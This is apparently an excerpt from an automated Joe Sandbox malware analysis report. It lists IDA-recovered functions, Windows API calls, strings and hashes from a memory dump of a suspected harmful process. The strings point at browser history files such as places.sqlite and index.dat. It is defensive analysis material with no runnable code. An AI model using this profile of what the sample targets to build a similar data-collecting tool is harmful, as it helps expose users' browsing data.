                                                                                                                                                                                                                                                                    • Part of subcall function 0040E01E: FindCloseChangeNotification.KERNELBASE(?), ref: 0040E13E
                                                                                                                                                                                                                                                                  • FindCloseChangeNotification.KERNELBASE(000000FF,000000FF,00000000,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E582
                                                                                                                                                                                                                                                                    • Part of subcall function 0040E2AB: memset.MSVCRT ref: 0040E380
                                                                                                                                                                                                                                                                    • Part of subcall function 0040E2AB: wcschr.MSVCRT ref: 0040E3B8
                                                                                                                                                                                                                                                                    • Part of subcall function 0040E2AB: memcpy.MSVCRT ref: 0040E3EC
                                                                                                                                                                                                                                                                  • DeleteFileW.KERNELBASE(?,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5A3
                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(000000FF,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5CA
                                                                                                                                                                                                                                                                    • Part of subcall function 0040E175: memset.MSVCRT ref: 0040E1BD
                                                                                                                                                                                                                                                                    • Part of subcall function 0040E175: _snwprintf.MSVCRT ref: 0040E257
                                                                                                                                                                                                                                                                    • Part of subcall function 0040E175: ??3@YAXPAX@Z.MSVCRT ref: 0040E28B
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: File$Close$ChangeFindHandleNotificationProcessViewmemset$??3@CreateCurrentDeleteDuplicateMappingOpenSizeUnmapWrite_snwprintfmemcpywcschr
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 1042154641-0
                                                                                                                                                                                                                                                                  • Opcode ID: 8c4b04af935ef543e183fc2d5fdeec50da417ae7152dfd79b37e36c3b45d6897
                                                                                                                                                                                                                                                                  • Instruction ID: 90d235a97b45fa8760f9e747b2c38a4e83ddeae1161d8ec943a7631d31c9d9e7
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8c4b04af935ef543e183fc2d5fdeec50da417ae7152dfd79b37e36c3b45d6897
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DA312CB1C00618ABCF60DF96CD456CEF7B8AF44318F1006AB9518B31A1DB755E95CF58
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C09
                                                                                                                                                                                                                                                                    • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C1E
                                                                                                                                                                                                                                                                    • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C47
                                                                                                                                                                                                                                                                    • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C70
                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 00403A55
                                                                                                                                                                                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                                                                                                    • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                                                                                                    • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                                                                                                    • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                                                                                                                    • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                                                                                                                                                                                                    • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A908
                                                                                                                                                                                                                                                                    • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
                                                                                                                                                                                                                                                                    • Part of subcall function 0040A8D0: memcpy.MSVCRT ref: 0040A94F
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: memsetwcscatwcslen$??3@$AttributesFilememcpywcscpy
                                                                                                                                                                                                                                                                  • String ID: history.dat$places.sqlite
                                                                                                                                                                                                                                                                  • API String ID: 3093078384-467022611
                                                                                                                                                                                                                                                                  • Opcode ID: 7e5fa77ffbd80df454c8f06c208cb8abd3a99e536342b00205f9bee392087e79
                                                                                                                                                                                                                                                                  • Instruction ID: 4d52d99a2018a06e8b3479be55870673e402391ac5db5fe9af26a684ed702786
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7e5fa77ffbd80df454c8f06c208cb8abd3a99e536342b00205f9bee392087e79
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CA112EB2A0111866DB10FA66CD4AACE77BCAF54354F1001B7B915B20C2EB3CAF45CA69
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 0040B1D1: wcslen.MSVCRT ref: 0040B1DE
                                                                                                                                                                                                                                                                    • Part of subcall function 0040B1D1: ??3@YAXPAX@Z.MSVCRT ref: 0040B201
                                                                                                                                                                                                                                                                    • Part of subcall function 0040B1D1: ??3@YAXPAX@Z.MSVCRT ref: 0040B224
                                                                                                                                                                                                                                                                    • Part of subcall function 0040B1D1: memcpy.MSVCRT ref: 0040B248
                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 0040B32F
                                                                                                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,0040B432,000000FF,?,00000FFF,00000000,00000000,0040B432,00000000,-00000002,0040B626,00000000), ref: 0040B348
                                                                                                                                                                                                                                                                    • Part of subcall function 0040B0D1: strlen.MSVCRT ref: 0040B0D8
                                                                                                                                                                                                                                                                    • Part of subcall function 0040B0D1: ??3@YAXPAX@Z.MSVCRT ref: 0040B0FB
                                                                                                                                                                                                                                                                    • Part of subcall function 0040B0D1: ??3@YAXPAX@Z.MSVCRT ref: 0040B12C
                                                                                                                                                                                                                                                                    • Part of subcall function 0040B0D1: memcpy.MSVCRT ref: 0040B159
                                                                                                                                                                                                                                                                  • ??3@YAXPAX@Z.MSVCRT ref: 0040B36F
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: ??3@$memcpy$ByteCharMultiWidememsetstrlenwcslen
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 1562205978-0
                                                                                                                                                                                                                                                                  • Opcode ID: 9a9af0b56875b3964aba26731374e6e386eaff1a5eed62c332bf2c4654fb4a60
                                                                                                                                                                                                                                                                  • Instruction ID: b857a4007f161fa5246434627f102fbdc01d58e76d807d6b79cc7eff8a49146b
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9a9af0b56875b3964aba26731374e6e386eaff1a5eed62c332bf2c4654fb4a60
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 18212771900218BFDB009B98EC44C9A37ACEB46329F10823BFC45A7292D7B8DD549B5D
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 00417570: SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                                                                                                                                                                                                                                                    • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A2
                                                                                                                                                                                                                                                                    • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A8
                                                                                                                                                                                                                                                                  • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 0041761D
                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 00417627
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: ErrorLast$File$PointerRead
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 839530781-0
                                                                                                                                                                                                                                                                  • Opcode ID: 35ac1a26cfbf5729ffddcbfd3a0d39ca45c1cff254cac5b3720273d0b32ffa80
                                                                                                                                                                                                                                                                  • Instruction ID: c9208e3d43fc8ff2949f7201360c8f82def2114e122364bdeb0a9035ecfb973e
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 35ac1a26cfbf5729ffddcbfd3a0d39ca45c1cff254cac5b3720273d0b32ffa80
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D001A236208204BBEB008F69DC45BDA3B78FB153B4F100427F908C6640E275D89096EA
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: memset
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2221118986-0
                                                                                                                                                                                                                                                                  • Opcode ID: aa4d0402c51c5d0a187992cb920f5d60b2687b534395d06311f142e6e57fc3d2
                                                                                                                                                                                                                                                                  • Instruction ID: ab827e58211017b50a374ecff23b92c7d33c5c2594aefa3e9ea54b4f7b6580b8
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: aa4d0402c51c5d0a187992cb920f5d60b2687b534395d06311f142e6e57fc3d2
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6A0167B3904308AAFB24D791DD8AB9A73ACDB14714F5100BBA704E21C3EBBC9B45865D
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: FileFindFirst
                                                                                                                                                                                                                                                                  • String ID: *.*$index.dat
                                                                                                                                                                                                                                                                  • API String ID: 1974802433-2863569691
                                                                                                                                                                                                                                                                  • Opcode ID: da4ae6558bc3f7d8c9357f2fa5faf2f590160579c2a5e59c58801196d12f8aed
                                                                                                                                                                                                                                                                  • Instruction ID: 5c3219b8572ff4376619b1de75d6d1d1b7443a793578eadcc31bed7d77429009
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: da4ae6558bc3f7d8c9357f2fa5faf2f590160579c2a5e59c58801196d12f8aed
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0E01257180125895EB20E761DC467DF766C9F04314F5002FB9818F21D6E7389F958F9A
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: ??3@mallocmemcpy
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3831604043-0
                                                                                                                                                                                                                                                                  • Opcode ID: 4a52a1335cfde8b1ca48f25083a26fca5b2b00b674d395485fb9b1b856b8e911
                                                                                                                                                                                                                                                                  • Instruction ID: 1240433d41d023da9ba75aa62d017d874606d7cfbee4c78203c9aa8101697722
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4a52a1335cfde8b1ca48f25083a26fca5b2b00b674d395485fb9b1b856b8e911
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 88F0E9727092219FC708AE75A98180BB79DAF55314B12482FF404E3282D7389C50CB58
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 004175A2
                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 004175A8
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: ErrorLast$FilePointer
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 1156039329-0
                                                                                                                                                                                                                                                                  • Opcode ID: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                                                                                                                                                                                                                                                  • Instruction ID: d6bca62a971eeae6b8c8b5ba9af71e52dcee60bc35e592f51b1cb5e4efccb3e3
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 03F03071918115FBCB009B75DC009AA7ABAFB05360B104726E822D7690E730E9409AA8
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                                                                                                                                                                                                                                  • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                                                                                                                                                                                                                  • GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Temp$DirectoryFileNamePathWindows
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 1125800050-0
                                                                                                                                                                                                                                                                  • Opcode ID: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                                                                                                                                                                                                                                                  • Instruction ID: b144c37017a21c6b5a3d1d2b3cfc872714830df517851edcd0bc871ed666fd71
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: ACE0927A500218A7DB109B61DC4DFC777BCFB45304F0001B1B945E2161EB349A848BA8
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: d
                                                                                                                                                                                                                                                                  • API String ID: 0-2564639436
                                                                                                                                                                                                                                                                  • Opcode ID: b7bdb433cc21537495b9453c0ef7e1d4136cbb83a95eb0b3518e055101e122e1
                                                                                                                                                                                                                                                                  • Instruction ID: 98c7df9677761670a5e344a1c7628a8b006f0a2246df1cf6f5c5c4488f8f87fd
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b7bdb433cc21537495b9453c0ef7e1d4136cbb83a95eb0b3518e055101e122e1
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4591ABB0508302AFDB20DF19D88196FBBE4BF88358F50192FF88497251D778D985CB9A
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: memset
                                                                                                                                                                                                                                                                  • String ID: BINARY
                                                                                                                                                                                                                                                                  • API String ID: 2221118986-907554435
                                                                                                                                                                                                                                                                  • Opcode ID: 791c3fd1504af4fac70d2b15fe323b793bb873d26b5eb9345bfe372344e0595c
                                                                                                                                                                                                                                                                  • Instruction ID: 089a0534c11c2c8a1092ab46fa13594887108ded84822111f9e073e703b485f9
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 791c3fd1504af4fac70d2b15fe323b793bb873d26b5eb9345bfe372344e0595c
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 41518B71A047059FDB21CF69C881BEA7BE4EF48350F14446AF849CB342E738D995CBA9
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT ref: 0040ECF9
                                                                                                                                                                                                                                                                    • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT ref: 0040EDC0
                                                                                                                                                                                                                                                                  • GetStdHandle.KERNEL32(000000F5), ref: 00410530
                                                                                                                                                                                                                                                                  • FindCloseChangeNotification.KERNELBASE(?), ref: 00410654
                                                                                                                                                                                                                                                                    • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                                                                                                                                                                                                                                    • Part of subcall function 0040973C: GetLastError.KERNEL32 ref: 00409750
                                                                                                                                                                                                                                                                    • Part of subcall function 0040973C: _snwprintf.MSVCRT ref: 0040977D
                                                                                                                                                                                                                                                                    • Part of subcall function 0040973C: MessageBoxW.USER32(?,?,Error,00000030), ref: 00409796
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: ??2@??3@ChangeCloseCreateErrorFileFindHandleLastMessageNotification_snwprintf
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 1161345128-0
                                                                                                                                                                                                                                                                  • Opcode ID: 331637186d7fda146188de6d28ea3842bad20729486783243114fed48956b45e
                                                                                                                                                                                                                                                                  • Instruction ID: c777e68e994987bb064ab7fb99de871126f79ef1b866bcb434911d427814d160
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 331637186d7fda146188de6d28ea3842bad20729486783243114fed48956b45e
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BE417231A00204EFCB25AF65C885A9E77B6EF84711F20446FF446A7291C7B99EC0DE59
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: _wcsicmp
                                                                                                                                                                                                                                                                  • String ID: /stext
                                                                                                                                                                                                                                                                  • API String ID: 2081463915-3817206916
                                                                                                                                                                                                                                                                  • Opcode ID: e32263b5b8ee2531379a68aaf94d61f4c2e86babe20e9cb478eb73a56fae033c
                                                                                                                                                                                                                                                                  • Instruction ID: 10e6e7fbaeb1b3fbdbf907bfc38f809d5841ace5bac79d7196eddb000c1bc607
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e32263b5b8ee2531379a68aaf94d61f4c2e86babe20e9cb478eb73a56fae033c
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 19218E30B00605AFD704EF6ACAC1AD9F7A9FF44304F10416AA419D7342DB79ADA18B95
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                                                                                                                                                  • GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                                                                                                                                                                                                    • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                                                                                                                                                                                                    • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                                                                                                                                    • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB63
                                                                                                                                                                                                                                                                    • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB88
                                                                                                                                                                                                                                                                  • FindCloseChangeNotification.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                                                                                                                                                                                                                    • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT ref: 0040B052
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: File$ByteCharMultiWide$??2@??3@ChangeCloseCreateFindNotificationReadSize
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 159017214-0
                                                                                                                                                                                                                                                                  • Opcode ID: 5551154f09d9ac0fe1cac7a20b9391cb02a4855cbb9d966ae120c46d578013b8
                                                                                                                                                                                                                                                                  • Instruction ID: dc8783d9a6c7baf78a377756874cfbd60b78407a6d3acdf6d1052ad5173bbb79
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5551154f09d9ac0fe1cac7a20b9391cb02a4855cbb9d966ae120c46d578013b8
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 91118275804208AFDB10AF6ADC45C8A7F75FF01364711C27AF525A72A1D6349A18CBA5
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                                                                                                                    • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                                                                                                                                                                                    • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                                                                                                                    • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                                                                                                                    • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                                                                                                                                                                                    • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                                                                                                                                                                                                                  • FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3150196962-0
                                                                                                                                                                                                                                                                  • Opcode ID: 86234f6dcfe5183eb12d2d600ddfcc7b691cb690ca4801b5099eddac0042a321
                                                                                                                                                                                                                                                                  • Instruction ID: e973b1bd6c29085855c002f2d91bff7161adaf38cfdf5e3d51a6561f1cc66020
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 86234f6dcfe5183eb12d2d600ddfcc7b691cb690ca4801b5099eddac0042a321
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D90192B1100211AAD6319FA6CC04D1BFAE9EFC0750B20883FF1D9E25A0D7B49881DB69
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  • failed to allocate %u bytes of memory, xrefs: 004152F0
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: malloc
                                                                                                                                                                                                                                                                  • String ID: failed to allocate %u bytes of memory
                                                                                                                                                                                                                                                                  • API String ID: 2803490479-1168259600
